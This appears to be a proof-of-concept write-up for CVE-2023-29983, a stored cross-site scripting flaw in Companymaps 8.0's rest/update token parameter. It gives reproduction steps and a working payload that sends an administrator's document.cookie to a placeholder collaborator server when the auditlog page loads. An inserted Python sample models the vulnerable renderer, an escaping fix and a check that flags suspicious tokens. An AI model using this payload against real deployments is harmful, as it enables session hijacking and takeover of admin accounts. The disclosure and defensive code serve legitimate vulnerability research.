
CVE-2023-29983 PoC — Companymaps Cross-Site Scripting Vulnerability

Source
Associated Vulnerability
Title: Companymaps Cross-Site Scripting Vulnerability (CVE-2023-29983)
Description: Companymaps is a company map, showing all desks and employees, developed by the individual developer Maximilian Vogt. Companymaps V8.0 contains a cross-site scripting vulnerability, which stems from a stored cross-site scripting (XSS) flaw.
Readme
# Exploit Title: Stored Cross Site Scripting
- Google Dork:
- Date: 27.04.2023
- Exploit Author: Lucas Noki (0xPrototype)
- Vendor Homepage: https://github.com/vogtmh
- Software Link: https://github.com/vogtmh/cmaps
- Version: 8.0
- Tested on: Mac, Windows, Linux
- CVE : CVE-2023-29983

*Description:*

The vulnerability found is Stored Cross Site Scripting. When the `rest/update/?token=` endpoint is hit with a request whose token parameter contains a malicious payload, the result is stored XSS. This happens because the input isn't sanitized: it is written as-is into the database. Then, when an admin visits the auditlog tab, the request is read back from the database and echoed directly into the page. This triggers the XSS every time someone visits the auditlog or refreshes it.

*Steps to reproduce:*

1. Clone the repository and install the application
2. Send a maliciously crafted payload via the "token" parameter to the following endpoint: /rest/update/?token=
3. The payload used is: <script>new+Image().src=\`http://YOUR_COLLABORATOR_SERVER/?c=${document.cookie}\`</script>
4. Simply visiting the complete URL: http://IP/rest/update/?token=PAYLOAD is enough.
5. Log in to the admin panel and go to the auditlog under: /admin/index.php?tab=auditlog
6. Check your collaborator server. You should have a request where the admin's cookie is the value of the c parameter.

In a real-world case you would need to wait for the admin to log into the application and open the auditlog tab.
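The sink described above (a stored request line echoed into the auditlog page) and its fix, as an added illustration that is not Companymaps' own code: a hypothetical model of the audit-log row renderer in its vulnerable and output-encoded forms, plus a triage check that flags stored tokens carrying markup. The `token` allowlist pattern and the audit-log row format are assumptions, not taken from the project.

```python
"""Hypothetical model of the Companymaps audit-log flaw; not the project's code."""
import html
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed audit-log rows: the raw request line is stored verbatim, as the
# advisory describes. The row format is an assumption for this example.
CONSTRUCTED_AUDITLOG = [
    "GET /rest/update/?token=abc123 HTTP/1.1",
    "GET /rest/update/?token=<script>alert(1)</script> HTTP/1.1",
]

# Assumed allowlist for a well-formed token; validate before storing anything.
TOKEN_PATTERN = re.compile(r"[A-Za-z0-9_-]{1,128}")


def render_row_vulnerable(request_line: str) -> str:
    # Echoes the stored request straight into the page: any markup inside the
    # token parameter is interpreted by the admin's browser (the reported bug).
    return f"<tr><td>{request_line}</td></tr>"


def render_row_fixed(request_line: str) -> str:
    # Output encoding for the HTML body context renders the stored text
    # literally; the database record itself is left unchanged.
    return f"<tr><td>{html.escape(request_line, quote=True)}</td></tr>"


def token_from_request_line(request_line: str) -> Optional[str]:
    # Extract the token parameter from a stored "METHOD path HTTP/x" line.
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None
    query = parse_qs(urlsplit(parts[1]).query, keep_blank_values=True)
    return query.get("token", [None])[0]


def token_is_well_formed(token: str) -> bool:
    # Server-side input validation as defence in depth alongside output encoding.
    return TOKEN_PATTERN.fullmatch(token) is not None


def flag_suspicious_tokens(rows: List[str]) -> List[str]:
    # Audit-log triage: return rows whose token fails the allowlist, so a
    # defender can review what was stored before the page renders it.
    flagged = []
    for row in rows:
        token = token_from_request_line(row)
        if token is not None and not token_is_well_formed(token):
            flagged.append(row)
    return flagged
```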

Special thanks goes out to iCaotix, who greatly helped me in getting the environment set up as well as debugging my payload.



## Request to the server:

<img src="image-20230430005643809.png" alt="image-20230430005643809" style="zoom:50%;" />

## Response from the collaborator after admin opens the audit log:

<img src="image-20230430010017153.png" alt="image-20230430010017153" style="zoom:50%;" />
File Snapshot

[4.0K] /data/pocs/648eb56d2022374ca82c29508e9eef1be2ab5e45
├── [116K] image-20230430005643809.png
├── [351K] image-20230430010017153.png
└── [1.9K] README.md

0 directories, 3 files